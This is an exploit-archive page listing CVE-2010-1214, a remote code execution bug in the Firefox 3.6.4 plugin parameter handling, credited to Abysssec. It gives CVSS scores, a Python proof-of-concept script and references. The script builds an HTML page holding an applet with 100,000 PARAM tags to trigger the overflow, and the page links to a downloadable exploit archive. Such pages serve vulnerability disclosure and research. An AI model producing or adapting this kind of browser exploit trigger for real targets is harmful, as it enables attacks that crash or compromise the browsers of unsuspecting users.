Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution

2010.09.22
Credit: Abysssec
Risk: High
Local: No
Remote: Yes
CWE: CWE-189


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/ http://www.exploit-db.com/sploits/moaub-17-exploit.zip ''' ''' Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution Version : Firefox 3.6.4 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1214 ''' import sys; myStyle = """ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>page demonstration</title> <link rel="stylesheet" type="text/css" href="style2.css" /> </head> <body id='msg'> <applet code = 'appletComponentArch.DynamicTreeApplet' archive = 'DynamicTreeDemo.jar', width = 300, height = 300 > """ i=0 while(i<100000): myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n"; i=i+1 myStyle = myStyle + """ </applet> </body> </html> """ cssFile = open("Abysssec.html","w") cssFile.write(myStyle) cssFile.close()

Referencje:

https://bugzilla.mozilla.org/show_bug.cgi?id=572985
http://www.mozilla.org/security/announce/2010/mfsa2010-37.html
http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11685


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top